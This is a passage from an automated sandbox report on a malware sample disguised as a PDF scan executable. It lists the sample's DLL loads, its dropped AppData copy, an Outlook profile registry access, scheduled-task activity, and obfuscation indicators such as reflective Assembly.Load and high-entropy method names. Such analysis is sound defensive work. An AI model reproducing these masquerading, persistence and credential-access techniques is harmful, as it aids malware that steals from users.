                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4280b90.2.raw.unpack, Uo.cs.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.cs.Net Code: xZm1NgDRCaGjKColeXB System.Reflection.Assembly.Load(byte[])
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, V2mHZPR0N4oyaDDFW0.cs.Net Code: xZm1NgDRCaGjKColeXB System.Reflection.Assembly.Load(byte[])
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.c380000.6.raw.unpack, V2mHZPR0N4oyaDDFW0.cs.Net Code: xZm1NgDRCaGjKColeXB System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD7898 push cs; iretd 1_2_08CD78A2
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD8FA9 push ds; iretd 1_2_08CD8FAA
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD8FA0 push ds; iretd 1_2_08CD8FA2
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD5F7B push F805CBFCh; retf 1_2_08CD5F85
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDC258 push eax; iretd 1_2_08CDC259
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CDC250 pushad ; iretd 1_2_08CDC251
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD77D8 push cs; iretd 1_2_08CD77DA
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD27D3 pushad ; iretd 1_2_08CD27D9
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 1_2_08CD77E0 push cs; iretd 1_2_08CD77E2
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01529C30 push esp; retf 0154h8_2_01529D55
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_0152891E pushad ; iretd 8_2_0152891F
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01528DDF push esp; iretd 8_2_01528DE0
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeCode function: 8_2_01528C2F pushfd ; iretd 8_2_01528C30
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F5F78 push F8059FFCh; retf 9_2_087F5F85
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 9_2_087F27D2 pushad ; iretd 9_2_087F27D9
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_01479C30 push esp; retf 02DAh13_2_01479D55
                  Source: C:\Users\user\AppData\Roaming\QeSBxb.exeCode function: 13_2_069D9233 push es; ret 13_2_069D9244
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeStatic PE information: section name: .text entropy: 7.862440033564903
                  Source: QeSBxb.exe.1.drStatic PE information: section name: .text entropy: 7.862440033564903
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, PUXfyYhOisseua71nE.csHigh entropy of concatenated method names: 'olTHQSFvXX', 'bLmH1ImYYt', 'RdQHGnljTk', 'zdAHt18exZ', 'eJqH9KaLdo', 'jvpHj0hS1P', 'uTJH7AIdhc', 'CPaHrJVHCP', 'TRgHZuUu75', 'punHYThhMC'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, d3UPZwfTJirq8rKYh5.csHigh entropy of concatenated method names: 'DHfAkkD6G', 'Mwgik0kDC', 'ydX0hyoCS', 'y9HmFdx0G', 'H3Q16hBaC', 'VmgplW6dM', 'BtZjxLuTDX22NxgqPa', 'okCIdeLk4OdPOnJkRl', 'uAsxVMfoV', 'TsadR9nn0'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, Y6jppOOik1jxEfnyeW.csHigh entropy of concatenated method names: 'cVTFqvP20K', 'EdHFMc5s47', 'lcsF5B2irN', 'LDUFBW4tj2', 'DTUFwoFrYW', 'lFXFeNaLnH', 'JqZFEOgUE7', 'lqdxXil0d9', 'vsgxISXe4N', 'DrrxJBYXIP'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, Q14uEPIZB2pWTOX8IE.csHigh entropy of concatenated method names: 'SE4xBiD6vW', 'UrTxwymvCm', 'urkx4hv5p8', 'hIAxeNAmf4', 'Lx9xEfDnFi', 'zVvxCwxytf', 'qL6xRTSYuy', 'k1vx2nbumv', 'zyJx3eWMka', 'JLWx6fpjZy'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, dhCiOE1gurdFYdZ8EU.csHigh entropy of concatenated method names: 'ONM4iyKTOY', 'FyT4067Eax', 'BLB4Q87qWj', 'I8V41OevHe', 'iW04kLdhFl', 'iJ94cquvl2', 'fY04uZFnnY', 'KG04x4bNM9', 'lBD4FYXvfJ', 'JYm4dxgmjR'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, dlgOETSLkDKjaBXuna.csHigh entropy of concatenated method names: 'QLSu3ljN2I', 'meKu6HEtDf', 'ToString', 'jaFuBSVVxn', 'bLEuwpldvP', 'TSSu4f9a1d', 'hXKuevi8yM', 'fjMuEXnjfQ', 'LqMuCbFchM', 'TkLuRyZlWm'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, EcUZlHV5xRcLAB93AA.csHigh entropy of concatenated method names: 'tQ9uICfKRk', 'FjFuOVjqwK', 'zkCxyKoEU4', 'MgOxqHumOa', 'GEsuYPUNXP', 'Dx3ub6PnZr', 'xbWuhNJ5S0', 'itGu8Ovk2j', 'X6susbaTr4', 'jptuNn6Vf0'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, b782kv8OjIfOJ04YOb.csHigh entropy of concatenated method names: 'eyWkZkV0vw', 's1Zkbf84Lu', 'qQ5k85iLHH', 'Vc4ksgqmH0', 'qHpktShYdc', 'S2Uklbs0Tr', 'ujGk9a1cRs', 'AgVkj99yXV', 'KMEkKGPoCy', 'jKvk7862SO'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, haAMWuqMIRY1u5L88Ga.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kGSd81TFoA', 'SuIdsSy5WE', 'jZHdNxdfmv', 'vBndSix9qq', 'yAndPw2OXY', 'G9TdVQTvGF', 'Ps2dXW5oZD'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, PTvxxmJotxLVN9STyr.csHigh entropy of concatenated method names: 'AJXxGQo1VE', 'nwfxt8wa3k', 'hjGxl5Z2km', 'huex9a7yhN', 'RRKx8IBcbi', 'NIXxj1pO3P', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, ux9vSlGKqPeRjOAVLu.csHigh entropy of concatenated method names: 'GIeEUfTglX', 'MbuEwEmHMr', 'Q7WEeaJhNX', 'mCMECSPajP', 'z5SERvXeyf', 'HPNePIJ9n8', 'CnXeV1XuFN', 's5yeXqatLQ', 'BPOeIBRi0E', 'ADveJOvVW7'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, l0rTNDqyDaNsKGgWCtZ.csHigh entropy of concatenated method names: 'XjgFvhYvZ8', 'trIFLWHgDA', 'G5aFAsD7uD', 'TFVFicf4ki', 'xbeFoZ8cQf', 'GQDF0l2Cfj', 'IuvFm60byb', 'kt6FQMf7ZQ', 'TcQF1rMdSM', 'yLgFp3gdpY'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, OcYj6lwsu9665C7RdN.csHigh entropy of concatenated method names: 'Dispose', 'utqqJqXZKy', 'nLGfti9LC0', 'rwxAAqilNt', 'a81qO4uEPZ', 'f2pqzWTOX8', 'ProcessDialogKey', 'WEhfyTvxxm', 'BtxfqLVN9S', 'uyrffO6jpp'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, beyHOCpHso4XwCAhW9.csHigh entropy of concatenated method names: 'kSoeonxfvJ', 'fS7emnTJKH', 'sZk4lldOeZ', 'k6549X86vM', 'j9j4jV1576', 'fBR4KYhm8Z', 'pv847YPTat', 'bPS4r7rUdN', 'tLC4nRCt4I', 'TCx4Z2KOTT'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, TZMrSA5bjF9p5nJuyn.csHigh entropy of concatenated method names: 'CAZqC4HVLf', 'IWEqRtmNwY', 'iguq3rdFYd', 'N8Eq6UqeyH', 'jAhqkW9Tx9', 'xSlqcKqPeR', 'lpgO2aN2q0cKvS865v', 'O67kPTA5rUHnVUQWb2', 'K5NqqsCeAN', 'uEsqMxCOmY'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, l3jrCG705X6hFIo3hF.csHigh entropy of concatenated method names: 'IFJCBJTUAx', 'Od3C4pm37W', 'WxOCEBX913', 'T8SEOrFEdZ', 'lPNEzp6weZ', 'tqjCytTKls', 'lV9CqGDwN8', 'rg1CfVJvYV', 'E0kCMqHcGw', 'e5LC50dHlv'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, V2mHZPR0N4oyaDDFW0.csHigh entropy of concatenated method names: 'MwbMU6oMTV', 'LhdMBfOSIY', 's59MwpBZPo', 'qZyM4PNQZ1', 'kNgMewummS', 'TAjME3oBAR', 'FxAMCnwo25', 'qDnMR0mMjX', 'JjhM2Enxy6', 'lI0M3CVgj7'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, N4HVLfQlWEtmNwYgDD.csHigh entropy of concatenated method names: 'caJw8qpg4T', 'lcpwsc7S67', 'aolwNLcUXm', 'GItwSa5kp7', 'whswPCY0XH', 'HNCwVgKREm', 'ih4wXWOdmC', 'RSYwIMn15b', 'LAiwJ2KaVY', 'XRIwO2sffO'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4d1e6b8.1.raw.unpack, LijqxanU7dEpkg6cli.csHigh entropy of concatenated method names: 'ssVCvpAh2R', 'sVaCLKyxWT', 'cmKCAAenyY', 'BotCi2YNRm', 'Nx4Coi2MCw', 'thbC0obhQL', 'ndNCmRYRfA', 'TZKCQGAUJJ', 'bgVC1xmXyp', 'O6wCpE5EJA'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, PUXfyYhOisseua71nE.csHigh entropy of concatenated method names: 'olTHQSFvXX', 'bLmH1ImYYt', 'RdQHGnljTk', 'zdAHt18exZ', 'eJqH9KaLdo', 'jvpHj0hS1P', 'uTJH7AIdhc', 'CPaHrJVHCP', 'TRgHZuUu75', 'punHYThhMC'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, d3UPZwfTJirq8rKYh5.csHigh entropy of concatenated method names: 'DHfAkkD6G', 'Mwgik0kDC', 'ydX0hyoCS', 'y9HmFdx0G', 'H3Q16hBaC', 'VmgplW6dM', 'BtZjxLuTDX22NxgqPa', 'okCIdeLk4OdPOnJkRl', 'uAsxVMfoV', 'TsadR9nn0'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, Y6jppOOik1jxEfnyeW.csHigh entropy of concatenated method names: 'cVTFqvP20K', 'EdHFMc5s47', 'lcsF5B2irN', 'LDUFBW4tj2', 'DTUFwoFrYW', 'lFXFeNaLnH', 'JqZFEOgUE7', 'lqdxXil0d9', 'vsgxISXe4N', 'DrrxJBYXIP'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, Q14uEPIZB2pWTOX8IE.csHigh entropy of concatenated method names: 'SE4xBiD6vW', 'UrTxwymvCm', 'urkx4hv5p8', 'hIAxeNAmf4', 'Lx9xEfDnFi', 'zVvxCwxytf', 'qL6xRTSYuy', 'k1vx2nbumv', 'zyJx3eWMka', 'JLWx6fpjZy'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, dhCiOE1gurdFYdZ8EU.csHigh entropy of concatenated method names: 'ONM4iyKTOY', 'FyT4067Eax', 'BLB4Q87qWj', 'I8V41OevHe', 'iW04kLdhFl', 'iJ94cquvl2', 'fY04uZFnnY', 'KG04x4bNM9', 'lBD4FYXvfJ', 'JYm4dxgmjR'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, dlgOETSLkDKjaBXuna.csHigh entropy of concatenated method names: 'QLSu3ljN2I', 'meKu6HEtDf', 'ToString', 'jaFuBSVVxn', 'bLEuwpldvP', 'TSSu4f9a1d', 'hXKuevi8yM', 'fjMuEXnjfQ', 'LqMuCbFchM', 'TkLuRyZlWm'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, EcUZlHV5xRcLAB93AA.csHigh entropy of concatenated method names: 'tQ9uICfKRk', 'FjFuOVjqwK', 'zkCxyKoEU4', 'MgOxqHumOa', 'GEsuYPUNXP', 'Dx3ub6PnZr', 'xbWuhNJ5S0', 'itGu8Ovk2j', 'X6susbaTr4', 'jptuNn6Vf0'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, b782kv8OjIfOJ04YOb.csHigh entropy of concatenated method names: 'eyWkZkV0vw', 's1Zkbf84Lu', 'qQ5k85iLHH', 'Vc4ksgqmH0', 'qHpktShYdc', 'S2Uklbs0Tr', 'ujGk9a1cRs', 'AgVkj99yXV', 'KMEkKGPoCy', 'jKvk7862SO'
                  Source: 1.2.Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe.4da30d8.0.raw.unpack, haAMWuqMIRY1u5L88Ga.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kGSd81TFoA', 'SuIdsSy5WE', 'jZHdNxdfmv', 'vBndSix9qq', 'yAndPw2OXY', 'G9TdVQTvGF', 'Ps2dXW5oZD'
